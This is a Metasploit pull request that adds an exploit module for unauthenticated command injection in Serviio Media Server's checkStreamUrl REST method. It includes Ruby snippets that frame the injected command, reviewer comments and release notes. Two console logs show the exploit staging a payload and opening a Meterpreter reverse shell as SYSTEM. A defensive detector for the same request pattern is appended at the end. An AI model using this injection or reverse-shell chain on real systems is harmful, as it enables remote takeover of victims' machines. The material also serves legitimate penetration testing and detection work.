Add Serviio Media Server checkStreamUrl Command Execution #8347

Merged
merged 4 commits into from May 16, 2017

bcoles commented May 5, 2017

This PR adds an exploit module for Serviio Media Server.

This module exploits an unauthenticated remote command execution vulnerability
in the console component of Serviio Media Server versions 1.4 to 1.8 on
Windows operating systems.

The console service (on port 23423 by default) exposes a REST API which
does not require authentication.

The 'action' API endpoint does not sufficiently sanitize user-supplied data
in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is
used in a call to cmd.exe resulting in execution of arbitrary commands.

This module has been tested successfully on Serviio Media Server versions
1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

Documentation

To follow; when I feel like it.

Verification

  • Start msfconsole
  • use exploit/windows/http/serviio_checkstreamurl_cmd_exec
  • check
  • Verify the check method returns Unknown if the connection to the target server fails.
  • Verify the check method returns Appears if the target server is Serviio version 1.4 to 1.8 on Windows.
  • Verify the check method returns Safe if the target server is not Serviio version 1.4 to 1.8 on Windows.
  • run
  • Verify you get a shell.

Output

msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check

[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Serviio Media Server version 1.8
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd 
C:\Program Files\Serviio\bin
def execute_command(cmd, opts = {})
json = { 'name' => 'checkStreamUrl',
'parameter' => ['VIDEO', "\" &#{cmd}&"] }.to_json
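Review bot: the 'parameter' line builds the VIDEO value as `"\" &#{cmd}&"` with no comment saying why it starts with a quote and wraps the command in `&`. A one-line comment describing how the server passes this value to cmd.exe would make the framing reviewable and easier to maintain.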

mmetince May 8, 2017

Contributor

Formatting suggestions.

    json = {
      'name'      => 'checkStreamUrl',
      'parameter' => ['VIDEO', "\" &#{cmd}&"]
    }.to_json

bcoles May 8, 2017

Author Contributor

No thanks

bcoles May 10, 2017

Author Contributor

Symmetrical style hash brace layout as per Rubocop MultilineHashBraceLayout in lieu of a Metasploit style guide.

However the .to_json call should probably be moved inside the send_request_uri method. I've fixed this.

'method' => 'POST',
'ctype' => 'application/json',
'data' => json)
end

mmetince May 8, 2017

Contributor

Yet another formatting suggestion.

send_request_cgi(
  'uri'    => normalize_uri(target_uri.path, 'rest', 'action'),
  'method' => 'POST',
  'ctype'  => 'application/json',
  'data'   => json
)

bcoles May 8, 2017

Author Contributor

No thanks

bcoles May 10, 2017

Author Contributor

Symmetrical style method call brace layout as per Rubocop MultilineMethodCallBraceLayout in lieu of a Metasploit style guide.

end

def exploit
fail_with(Failure::NoTarget, 'Target is not vulnerable') unless check == CheckCode::Appears
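Review bot: `unless check == CheckCode::Appears` also fires when `check` returns Unknown (the result listed above for a failed connection), yet the message says 'Target is not vulnerable'. Branch on the check code so an unreachable or unidentified target is reported as such rather than as not vulnerable.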

mmetince May 8, 2017

Contributor

I believe you may want to use Failure::NotVulnerable instead of Failure::NoTarget.

bcoles May 8, 2017

Author Contributor

Fixed

bcoles added 2 commits May 8, 2017
@wchen-r7 wchen-r7 self-assigned this May 16, 2017

wchen-r7 commented May 16, 2017

Testing...

wchen-r7 commented May 16, 2017

Flawless victory:

msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 192.168.146.171:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 192.168.146.171
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.171:49186) at 2017-05-16 16:17:37 -0500

meterpreter > 
@wchen-r7 wchen-r7 merged commit 42c7d64 into rapid7:master May 16, 2017
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
wchen-r7 added a commit that referenced this pull request May 16, 2017

wchen-r7 commented May 16, 2017

Release Notes

The exploits/windows/http/serviio_checkstreamurl_cmd_exec module has been added to the framework. It exploits a vulnerability in Serviio Media Server. Serviio is a free media server that allows you to stream video, audio, and images. The console service in Serviio exposes a REST API that allows a remote user to execute system commands, which can be abused to gain arbitrary remote code execution under the context of SYSTEM (on Windows).

@tdoan-r7 tdoan-r7 added the rn-exploit label May 18, 2017
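
A defender-side check for the request shape described in this PR, added here as an example (not code from the module or from Serviio): it scans request records for `checkStreamUrl` calls to `/rest/action` whose parameter values contain characters that are invalid in a URL but meaningful to cmd.exe. The record layout, sample addresses, function names and the character set are assumptions, and the sample requests are constructed.

```ruby
require 'json'

# Characters that are not valid unencoded in a URL (RFC 3986) but are
# meaningful to cmd.exe. '&' and '%' are left out: real stream URLs use them.
# (Assumption: character set chosen for this example.)
SUSPICIOUS = /["|<>^\s]/

# Returns a reason string when a request to the console API looks like
# command injection through checkStreamUrl, otherwise nil.
def suspicious_checkstreamurl(method, path, body)
  return nil unless method.to_s.casecmp?('POST')
  return nil unless path.to_s.split('?').first.to_s.chomp('/').end_with?('/rest/action')

  doc = JSON.parse(body.to_s)
  return nil unless doc.is_a?(Hash) && doc['name'] == 'checkStreamUrl'

  params = doc['parameter']
  return 'checkStreamUrl without a parameter list' unless params.is_a?(Array)

  bad = params.drop(1).map(&:to_s).find { |v| v.match?(SUSPICIOUS) }
  bad ? "non-URL characters in checkStreamUrl value: #{bad.inspect}" : nil
rescue JSON::ParserError
  # A body that is not JSON on this endpoint is worth reviewing too.
  'unparseable JSON body sent to /rest/action'
end

# Constructed sample records (hypothetical log layout, documentation addresses).
SAMPLE_REQUESTS = [
  { src: '192.0.2.10', method: 'POST', path: '/rest/action',
    body: '{"name":"checkStreamUrl","parameter":["VIDEO","http://media.example/live.m3u8?a=1&b=2"]}' },
  { src: '192.0.2.66', method: 'POST', path: '/rest/action',
    body: '{"name":"checkStreamUrl","parameter":["VIDEO","\" &COMMAND&"]}' },
  { src: '192.0.2.77', method: 'POST', path: '/rest/action', body: '{"name":' }
].freeze

# Returns one alert hash per suspicious record.
def scan(requests)
  requests.each_with_object([]) do |r, alerts|
    reason = suspicious_checkstreamurl(r[:method], r[:path], r[:body])
    alerts << { src: r[:src], reason: reason } if reason
  end
end

scan(SAMPLE_REQUESTS).each { |a| puts "#{a[:src]}: #{a[:reason]}" }
```

Because the console API requires no authentication, this check complements restricting access to port 23423 rather than replacing it.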